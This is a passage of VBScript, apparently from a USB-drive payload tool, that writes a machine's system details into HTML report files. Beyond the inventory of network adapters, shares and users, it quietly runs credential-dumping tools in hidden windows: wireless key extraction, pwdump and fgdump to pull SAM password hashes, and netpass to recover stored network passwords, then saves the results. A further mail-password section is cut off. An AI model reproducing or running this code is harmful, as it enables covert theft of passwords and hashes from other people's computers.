"&lt;tr&gt;&lt;td&gt;&lt;b&gt;Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Version &amp; "&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Service Pack&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.ServicePackMajorVersion &amp; "." &amp; _ objOS.ServicePackMinorVersion &amp; "&lt;/td&gt;&lt;/tr&gt;" Next Set dtmConvertedDate = Nothing Set objWMIService = Nothing Set colOSes = Nothing 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colAdapters = objWMIService.ExecQuery _ ("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True") n = 1 objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_2"" target=""right""&gt;Network Adapters&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_2""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Network Adapters&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" For Each objAdapter in colAdapters 'Create a table objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Entry Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;"&amp; objAdapter.Description &amp;"&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Adapter Name&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; n &amp;"&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Adapter Description&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objAdapter.Description &amp;"&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;APhysical (MAC) address&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objAdapter.MACAddress &amp;"&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Host name&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objAdapter.DNSHostName &amp;"&lt;/td&gt;&lt;/tr&gt;" If Not IsNull(objAdapter.IPAddress) Then objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;IP address&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" For i = 0 To UBound(objAdapter.IPAddress) objRightFile.WriteLine objAdapter.IPAddress(i) &amp; vbCrLf Next objRightFile.WriteLine "&lt;/td&gt;&lt;/tr&gt;" End If If Not IsNull(objAdapter.IPSubnet) Then objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Subnet&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" For i = 0 To UBound(objAdapter.IPSubnet) objRightFile.WriteLine objAdapter.IPSubnet(i) &amp; vbCrLf Next objRightFile.WriteLine "&lt;/td&gt;&lt;/tr&gt;" End If If Not IsNull(objAdapter.DefaultIPGateway) Then objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Default Gateway&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" For i = 0 To UBound(objAdapter.DefaultIPGateway) objRightFile.WriteLine objAdapter.DefaultIPGateway(i) &amp; vbCrLf Next objRightFile.WriteLine "&lt;/td&gt;&lt;/tr&gt;" End If If Not IsNull(objAdapter.DNSServerSearchOrder) Then objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;DNS servers in search order&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" For i = 0 To UBound(objAdapter.DNSServerSearchOrder) objRightFile.WriteLine objAdapter.DNSServerSearchOrder(i) &amp; vbCrLf Next objRightFile.WriteLine "&lt;/td&gt;&lt;/tr&gt;" End If objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;DNS servers in search order&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objAdapter.DNSDomain &amp; "&lt;/td&gt;&lt;/tr&gt;" If Not IsNull(objAdapter.DNSDomainSuffixSearchOrder) Then objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;DNS suffix search list&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" For i = 0 To UBound(objAdapter.DNSDomainSuffixSearchOrder) objRightFile.WriteLine objAdapter.DNSDomainSuffixSearchOrder(i) &amp; vbCrLf Next objRightFile.WriteLine "&lt;/td&gt;&lt;/tr&gt;" End If objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;DHCP enabled&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objAdapter.DHCPEnabled &amp;"&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;DHCP server&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp;objAdapter.DHCPServer &amp;"&lt;/td&gt;&lt;/tr&gt;" If Not IsNull(objAdapter.DHCPLeaseObtained) Then utcLeaseObtained = objAdapter.DHCPLeaseObtained strLeaseObtained = WMIDateStringToDate(utcLeaseObtained) Else strLeaseObtained = "" End If objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Lease Obtained&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; strLeaseObtained &amp;"&lt;/td&gt;&lt;/tr&gt;" If Not IsNull(objAdapter.DHCPLeaseExpires) Then utcLeaseExpires = objAdapter.DHCPLeaseExpires strLeaseExpires = WMIDateStringToDate(utcLeaseExpires) Else strLeaseExpires = "" End If objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Lease Expires&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; strLeaseExpires &amp;"&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Primary WINS Server&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objAdapter.WINSPrimaryServer &amp;"&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;tr&gt;&lt;td bgcolor=""#ffffff""&gt;&lt;b&gt;Secondary WINS Server&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objAdapter.WINSSecondaryServer &amp;"&lt;/td&gt;&lt;/tr&gt;" 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt; &lt;/p&gt;" n = n + 1 Next '+----------------------------------+ '+ [Shares] + '+----------------------------------+ objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_4"" target=""right""&gt;System Shares&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_4""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;System Shares&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\.\root\cimv2") Set colShares = objWMIService.ExecQuery("Select * from Win32_Share") 'Create a table objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Allow Maximum&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Caption&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Maximum Allowed&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Path&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Type&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" For each objShare in colShares objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objShare.AllowMaximum &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objShare.Caption &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objShare.MaximumAllowed &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objShare.Name &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objShare.Path &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objShare.Type &amp; "&lt;/td&gt;&lt;/tr&gt;" Next Set objWMIService = Nothing Set colShares = Nothing 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" '+----------------------------------+ '+ [Users] + '+----------------------------------+ objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_5"" target=""right""&gt;System Users&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_5""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;System Users&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" strLine = "" If ReadINI("Users","Method",strIniFile) = 1 Then 'Create a table objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Account Type&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Caption&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Description&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Disabled&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Domain&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Full Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Local Account&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Lockout&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Password Changeable&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Password Expires&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Password Required&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;SID&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;SID Type&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Status&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\" &amp; strComputerName &amp; "\root\cimv2") Set colItems = objWMIService.ExecQuery _ ("Select * from Win32_UserAccount Where LocalAccount = True") For Each objItem in colItems objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objItem.AccountType &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Caption &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Description &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Disabled &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Domain &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.FullName &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.LocalAccount &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Lockout &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Name &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.PasswordChangeable &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.PasswordExpires &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.PasswordRequired &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.SID &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.SIDType &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Status &amp; "&lt;/td&gt;&lt;/tr&gt;" Next else 'Create a table objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Full Name&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Description&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Lockout&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Disabled&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Admin?&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" Set objComputer = GetObject("WinNT://.") objComputer.Filter = Array( "User" ) 'Set objGroup = GetObject("WinNT://./Administrators,group") For Each objItem In objComputer objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; objItem.Name &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.FullName &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.Description &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.IsAccountLocked &amp; "&lt;/td&gt;" objRightFile.WriteLine "&lt;td&gt;" &amp; objItem.AccountDisabled &amp; "&lt;/td&gt;" strIsAdmin = "?" objRightFile.WriteLine "&lt;td&gt;" &amp; strIsAdmin &amp; "&lt;/td&gt;&lt;/tr&gt;" Next End If 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If ' +----------------------------------+ ' + [External IP] + ' +----------------------------------+ If ReadINI("External IP","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_6"" target=""right""&gt;External IP&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_6""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;External IP&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;IP&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" URL= ReadINI("External IP","url",strIniFile) If ReadINI("External IP","Method",strIniFile) = 1 Then Set http = CreateObject("Microsoft.XmlHttp") http.open "GET", URL, FALSE http.send "" strResponse = RemoveHTML(http.responseText) Set http = Nothing Else objShell.Exec("wget.exe " &amp; URL &amp; "--output-document=" &amp; strtmpFile) If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strResponse = RemoveHTML(objTextFile.ReadLine) objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End If objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;" &amp; Right(strResponse, Len(strResponse) - InStr(strResponse,":")) &amp; "&lt;/td&gt;&lt;/tr&gt;" 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If ' +----------------------------------+ ' + [VNC] + ' +----------------------------------+ If ReadINI("VNC","Enable",strIniFile) Then 'Not Implemented End If ' +----------------------------------+ ' + [HakSaw] + ' +----------------------------------+ If ReadINI("Haksaw","Enable",strIniFile) Then 'Not Implemented End if ' +----------------------------------+ ' + [Dump Wifi Hex] + ' +----------------------------------+ If ReadINI("WIFI Key","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_7"" target=""right""&gt;Wireless Hex&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_7""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Wireless Key&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "wifike.exe /shtml " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if End if ' +----------------------------------+ ' + [Dump SAM PWDUMP] + ' +----------------------------------+ If ReadINI("SAM PWDUMP","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_8"" target=""right""&gt;SAM PWDUMP&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_8""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;PWDump&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" If isAdmin then objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Username&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;UID&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Encrypted password&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;LAN Man Password Hash&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Windows NT Password Hash&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Full Name and Description&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Home directory&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objShell.Run "pwdump -o " &amp; strtmpFile &amp; " " &amp; strComputerName , 0, False Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\.\root\cimv2") '// 5 Second Watchdog Timer // '// // Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'pwdump.exe'") Do Until (DateDiff("s", Secs, Now()) &gt; 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'pwdump.exe'") Loop If colProcessList.Count &lt;&gt; 0 Then 'kill process it shouldn't run this long For Each objProcess in colProcessList objProcess.Terminate() Next End If '\\ \\ '\\ End Watchdog Timer \\ ' If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) Do Until objTextFile.AtEndOfStream strarry = Split(objTextFile.ReadLine,":") strline = "" For i =0 To UBound(strarry) strline = strline &amp; "&lt;td&gt;" &amp; strarry(i) &amp; "&lt;/td&gt;" Next objRightFile.WriteLine "&lt;tr&gt;" &amp; strLine &amp; "&lt;/tr&gt;" Loop 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If Else objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Result&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;td&gt;Not Admin&lt;/td&gt;" objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If End if ' +----------------------------------+ ' + [Dump SAM FGDUMP] + ' +----------------------------------+ If ReadINI("SAM FGDUMP","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_9"" target=""right""&gt;SAM FGDUMP&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_9""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;FGDump&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" If isAdmin then objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Username&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;UID&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Encrypted password&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;LAN Man Password Hash&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Windows NT Password Hash&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Full Name and Description&lt;/b&gt;&lt;/td&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Home directory&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" 'Change Directory objShell.CurrentDirectory =strLogPath objShell.Run U3 &amp; "\fgdump.exe -c -k " , 0, False Set objWMIService = GetObject("winmgmts:" _ &amp; "{impersonationLevel=impersonate}!\\.\root\cimv2") '// 5 Second Watchdog Timer // '// // Secs = Now() Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Do Until (DateDiff("s", Secs, Now()) &gt; 5) or colProcessList.Count = 0 Set colProcessList = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'fgdump.exe'") Loop If colProcessList.Count &lt;&gt; 0 Then 'kill process it shouldn't run this long For Each objProcess in colProcessList objProcess.Terminate() Next End If '\\ \\ '\\ End Watchdog Timer \\ ' If objFSO.FileExists("127.0.0.1.pwdump") Then Set objTextFile = objFSO.OpenTextFile("127.0.0.1.pwdump", FOR_READING) Do Until objTextFile.AtEndOfStream strarry = Split(objTextFile.ReadLine,":") strline = "" For i =0 To UBound(strarry) strline = strline &amp; "&lt;td&gt;" &amp; strarry(i) &amp; "&lt;/td&gt;" Next objRightFile.WriteLine "&lt;tr&gt;" &amp; strLine &amp; "&lt;/tr&gt;" Loop 'End Table objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" objShell.CurrentDirectory = U3 objTextFile.Close Set objTextFile = Nothing End If WScript.Sleep CInt(Sleepms) Else objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _ "&lt;td class=""colhead""&gt;&lt;b&gt;Result&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine "&lt;td&gt;Not Admin&lt;/td&gt;" objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;" End If End If ' +----------------------------------+ ' + [Dump Network PW] + ' +----------------------------------+ If ReadINI("Network Password","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" &amp; strDate &amp; "-" &amp; strTime &amp; "].html" &amp; "#cat_10"" target=""right""&gt;Network Password&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objRightFile.WriteLine"&lt;p&gt;&lt;a name=""cat_10""&gt;&lt;/a&gt;&lt;font size=""3""&gt;&lt;b&gt;Network Password&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;" objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;" objShell.Run "netpass.exe /shtml " &amp; strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) strLine = objTextFile.ReadLine Do Until InStr(1,strLine,"&lt;body&gt;",1) Or objTextFile.AtEndOfStream strLine = objTextFile.ReadLine Loop Do Until objTextFile.AtEndOfStream strLine = objTextFile.Readline If InStr(1,strLine,"&lt;/body&gt;",1) =0 Then objRightFile.WriteLine strLine End If Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End If End If ' +----------------------------------+ ' + [Dump Mail PW] + ' +----------------------------------+ If ReadINI("Mail Password","Enable",strIniFile) Then objLeftFile.WriteLine"&lt;tr&gt;&lt;td&gt;&lt;b&gt;* &lt;a href=""" &amp; "right-[" 